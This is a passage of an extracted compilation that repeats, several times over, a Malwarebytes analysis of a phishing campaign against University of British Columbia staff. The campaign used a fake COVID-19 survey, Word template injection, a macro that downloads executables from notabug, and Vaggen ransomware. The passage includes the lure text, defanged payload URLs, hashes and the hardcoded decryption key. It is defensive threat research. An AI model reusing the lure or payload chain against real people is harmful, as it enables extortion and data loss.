3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 193 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 194 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 195 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 196 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 197 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 198 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 199 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 200 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 201 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 202 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 203 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 204 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 205 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 206 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 207 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 208 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 209 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 210 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 211 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 212 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 213 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 214 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 215 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 216 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 217 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 218 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 219 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 220 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 221 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 222 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 223 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template 